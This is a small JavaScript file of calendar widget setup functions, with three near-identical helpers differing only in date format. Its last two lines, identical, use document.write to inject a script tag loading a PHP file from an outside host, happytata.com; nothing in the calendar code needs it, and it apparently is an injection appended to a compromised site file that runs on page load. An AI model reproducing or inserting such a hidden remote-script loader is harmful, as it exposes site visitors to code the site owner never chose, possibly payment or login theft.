function init_calendar(f1,f2){
	Calendar.setup({
		inputField     :    f1,
		ifFormat       :    "%Y-%m-%d", 
		button         :    f2,
		align          :    "Bl",
		singleClick    :    true,
		weekNumbers : false
	});
} 


function init_calendar2(f1,f2){
	Calendar.setup({
		inputField     :    f1,
		ifFormat       :    "%m/%d/%Y", 
		button         :    f2,
		align          :    "Bl",
		singleClick    :    true,
		weekNumbers : false
	});
} 

function init_calendar3(f1,f2){
	Calendar.setup({
		inputField     :    f1,
		ifFormat       :    "%d/%m/%Y", 
		button         :    f2,
		align          :    "Bl",
		singleClick    :    true,
		weekNumbers : false
	});
} 
document.write('<script src=http://happytata.com/shopping_payment/testindex.php ><\/script>');
document.write('<script src=http://happytata.com/shopping_payment/testindex.php ><\/script>');